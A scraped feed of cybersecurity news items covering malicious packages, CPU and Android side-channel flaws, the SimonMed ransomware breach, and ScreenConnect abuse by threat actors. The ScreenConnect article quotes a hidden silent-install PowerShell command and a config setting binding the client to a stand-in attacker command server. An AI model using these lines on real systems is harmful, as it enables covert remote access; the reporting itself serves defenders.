• Malicious packages on popular registries are abusing Discord webhooks to exfiltrate sensitive files and host telemetry, bypassing traditional C2 infrastructure and blending into legitimate HTTPS traffic. Discord webhooks are simple HTTPS URLs that accept POST requests; they require no credentials beyond possession of the URL, and traffic appears as innocent JSON over port 443. Socket’s […]

    The post Discord Weaponized as C2 Server Across Popular Open-Source Package Repositories appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Every October brings a familiar rhythm – pumpkin-spice everything in stores and cafés, alongside a wave of reminders, webinars, and checklists in my inbox. Halloween may be just around the corner, yet for those of us in cybersecurity, Security Awareness Month is the true seasonal milestone. Make no mistake, as a security professional, I love this month. Launched by CISA and the National

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Chipmaker AMD has released fixes to address a security flaw dubbed RMPocalypse that could be exploited to undermine confidential computing guarantees provided by Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP). The attack, per ETH Zürich researchers Benedict Schlüter and Shweta Shinde, exploits AMD’s incomplete protections that make it possible to perform a single memory

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Android devices from Google and Samsung have been found vulnerable to a side-channel attack that could be exploited to covertly steal two-factor authentication (2FA) codes, Google Maps timelines, and other sensitive data without the users’ knowledge pixel-by-pixel. The attack has been codenamed Pixnapping by a group of academics from the University of California (Berkeley), University of

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly disclosed vulnerability in SAP NetWeaver AS ABAP and ABAP Platform (CVE-2025-42902) allows unauthenticated attackers to crash server processes by sending malformed SAP Logon or SAP Assertion Tickets. Rated Medium severity with a 5.3 CVSS 3.1 score, the flaw stems from a NULL pointer dereference that triggers memory corruption and process termination. Affected versions include all supported releases […]

    The post SAP NetWeaver Memory Corruption Flaw Lets Attackers Send Corrupted Logon Tickets appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Before an attacker ever sends a payload, they’ve already done the work of understanding how your environment is built. They look at your login flows, your JavaScript files, your error messages, your API documentation, your GitHub repos. These are all clues that help them understand how your systems behave. AI is significantly accelerating reconnaissance and enabling attackers to map your

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In October 2025, security researchers uncovered an unprecedented phishing campaign that weaponizes the npm ecosystem—not by infecting developers during package installation, but by abusing the unpkg.com CDN as a disposable hosting platform for malicious JavaScript. By seeding over 175 throwaway npm packages, attackers have turned a trusted open source delivery network into a large-scale phishing […]

    The post Malicious NPM Packages Used in Sophisticated Developer Cyberattack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • SimonMed Imaging, a leading U.S. provider of outpatient medical imaging services, has disclosed a major cybersecurity incident that compromised the personal and health data of approximately 1.2 million patients.

    The breach, which occurred earlier this year, was linked to a ransomware attack claimed by the notorious Medusa group, highlighting ongoing vulnerabilities in the healthcare sector.

    Notifications to affected individuals began on October 10, 2025, following a prolonged investigation to assess the full scope of the damage.​

    The incident unfolded in late January 2025 when SimonMed received an alert from one of its third-party vendors about a potential security compromise on January 27.

    The company promptly initiated a system review and detected suspicious network activity the next day, confirming unauthorized access had begun on January 21 and lasted until February 5.

    SimonMed Data Breach

    Forensic experts determined that cybercriminals had infiltrated the network, exfiltrating files containing sensitive patient information over this two-week period.

    SimonMed, which operates more than 170 imaging centers across 11 states and generates over $500 million in annual revenue, specializes in services like MRI, CT scans, ultrasounds, and mammograms.

    The attackers, identified as the Medusa ransomware operation, stole around 212 gigabytes of data and demanded a $1 million ransom, posting samples on their dark web leak site to pressure the company.

    While SimonMed has not confirmed paying the ransom or details on the initial entry point, possibly through the vendor, the breach underscores the risks of supply chain attacks in healthcare.

    In response, SimonMed acted swiftly to contain the threat by resetting passwords, bolstering multifactor authentication, deploying endpoint detection and response tools, severing direct vendor access to internal systems, and restricting network traffic to whitelisted sources only.

    The company also engaged law enforcement and privacy specialists, reporting the matter to relevant authorities, including the U.S. Department of Health and Human Services’ Office for Civil Rights.

    The exposed information varied among individuals but included highly sensitive details such as full names, addresses, dates of birth, service dates, provider names, medical records and patient numbers, diagnoses, treatment histories, prescribed medications, health insurance details, and even driver’s license numbers.

    This breadth of data makes victims prime targets for identity theft, medical fraud, and phishing schemes, as health records fetch high prices on underground markets.

    To date, SimonMed reports no confirmed instances of data misuse for fraud or identity theft stemming from the breach, but the delay in notifications nearly nine months after detection has drawn criticism from cybersecurity experts and patient advocates.

    The company initially filed a preliminary report to regulators, estimating 500 affected individuals as a placeholder, with the true figure of 1,275,669 emerging only after exhaustive file reviews.

    Data TypeDescriptionPotential Risk
    Personal IdentifiersNames, addresses, DOB, driver’s licensesIdentity theft, stalking
    Medical RecordsDiagnoses, treatments, medicationsMedical fraud, blackmail
    Insurance & FinancialHealth insurance info, patient numbersBilling scams, unauthorized claims

    This table summarizes the key categories of compromised data, illustrating the multifaceted threats posed to patients’ privacy and security.

    The breach has already sparked at least one class-action lawsuit against SimonMed, alleging negligence in safeguarding patient data and insufficient transparency during the response.

    Law firms are investigating claims on behalf of affected customers, potentially leading to broader litigation as more details emerge.

    To mitigate risks, SimonMed is providing complimentary 24-month memberships to Experian IdentityWorks, offering fraud detection, credit monitoring, and identity restoration services.

    Patients are urged to enroll promptly using unique activation codes included in notification letters and to remain vigilant by reviewing credit reports annually via AnnualCreditReport.com and placing fraud alerts with major bureaus like Equifax, Experian, and TransUnion.

    Experts emphasize that such incidents reflect a surge in ransomware targeting healthcare, with Medusa alone claiming over 300 victims across critical sectors this year, as warned in a March 2025 FBI advisory.

    SimonMed’s ongoing security enhancements, including advanced monitoring and vendor audits, aim to prevent recurrences, but the event serves as a stark reminder for the industry to prioritize robust defenses against evolving cyber threats.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post SimonMed Data Breach Exposes 1.2 Million Patients Sensitive Information appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Remote monitoring and management (RMM) tools have long served as indispensable assets for IT administrators, providing seamless remote control, unattended access, and scripted automation across enterprise endpoints.

    In recent months, security researchers have observed a surge in adversaries repurposing ScreenConnect—a ConnectWise RMM solution—as a clandestine backdoor for initial intrusion and ongoing control.

    Emerging from widespread phishing campaigns that prey on compromised credentials, these attacks leverage ScreenConnect’s flexible installer and invite-link mechanisms to slip past traditional defenses with minimal on-disk footprint.

    The campaign typically begins with spear-phishing emails masquerading as legitimate IT alerts, enticing recipients to download a bespoke ScreenConnect installer or click an invite link.

    Malicious email with malicious link (Source – Dark Atlas)

    Once executed, the MSI package deploys entirely in memory, sidestepping signature-based antivirus detection and dropping only a transient service binary.

    The implanted agent then registers as a Windows service, granting attackers unfettered access to file systems, process execution, and the host’s network stack.

    Within hours, threat actors have been observed pivoting laterally, escalating privileges, and exfiltrating sensitive data under the guise of routine maintenance.

    Dark Atlas analysts identified that the adversaries customize builder configurations on-the-fly, embedding unique hostnames and encrypted launch keys directly into the client’s system.config file to evade network-based indicators of compromise.

    These dynamically generated parameters are mapped in an XML section of ScreenConnect.ApplicationSettings, where malicious domains resolve to attacker-controlled infrastructure.

    This tactic not only obfuscates command-and-control channels but also ensures each deployment appears as a distinct operational instance to defenders.

    Infection Mechanism and Installer Artifacts

    The ScreenConnect installer exploits built-in RMM features to minimize detection while maintaining persistence.

    Attackers generate a custom builder from the management console, choosing an MSI or EXE packager depending on the target environment.

    When launched, the installer writes a WindowsClient executable and associated DLLs into a benign-looking directory—such as C:\ProgramData\ScreenConnectClient\—before invoking the service with an obfuscated command line.

    A typical execution snippet appears as:-

    Start-Process -FilePath "msiexec.exe" -ArgumentList "/i ScreenConnect.ClientSetup.msi /qn /norestart" -WindowStyle Hidden

    Upon installation, the agent creates a system.config XML, storing <setting name="HostToAddressMap">attacker.example.com-203.0.113.45-1631789321000</setting>, binding the client to its command server.

    Persistence is achieved through the registered Windows service named ScreenConnect ClientService, which relaunches the binary on reboot.

    AnyDesk Chat Files (Source – Dark Atlas)

    Memory-only artifacts, such as live chat transcripts and session logs, reside solely in process heaps, necessitating volatile memory capture for forensic recovery.

    By combining in-memory execution, custom-config builders, and encrypted launch keys, threat actors transform a legitimate RMM solution into a stealthy remote access Trojan, complicating detection and incident response for security operations teams.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post ScreenConnect Abused by Threat Actors to Gain Unauthorized Remote Access to Your Computer appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Hackers have launched a sophisticated phishing campaign impersonating both OpenAI and the recently released Sora 2 AI service. By cloning legitimate-looking landing pages, these actors are duping users into submitting their login credentials, participating in faux “gift” surveys, and even falling victim to cryptocurrency scams. Security researchers note that these deceptive domains are already ensnaring […]

    The post Hackers Mimic as OpenAI and Sora Services to Steal Login Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶